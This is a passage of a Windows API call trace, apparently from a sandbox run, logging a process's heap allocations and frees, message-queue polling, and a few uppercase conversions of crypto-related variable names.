(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0101.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.288] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0101.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.289] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.289] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0101.289] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0101.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0101.293] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0101.293] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0101.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.293] PeekMessageW (in: lpMsg=0x144e02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e02c) returned 0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0101.293] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0101.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0101.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0101.294] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0101.294] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0101.294] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0101.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caad8 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0101.294] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0101.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 